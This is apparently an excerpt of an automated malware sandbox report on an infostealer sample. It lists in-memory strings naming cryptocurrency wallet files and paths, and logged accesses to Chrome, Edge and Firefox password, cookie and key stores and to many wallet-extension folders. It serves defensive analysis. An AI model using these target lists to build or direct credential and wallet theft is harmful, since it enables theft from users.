Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: MultiDoge
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000003.1786821317.000000000175D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\.
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
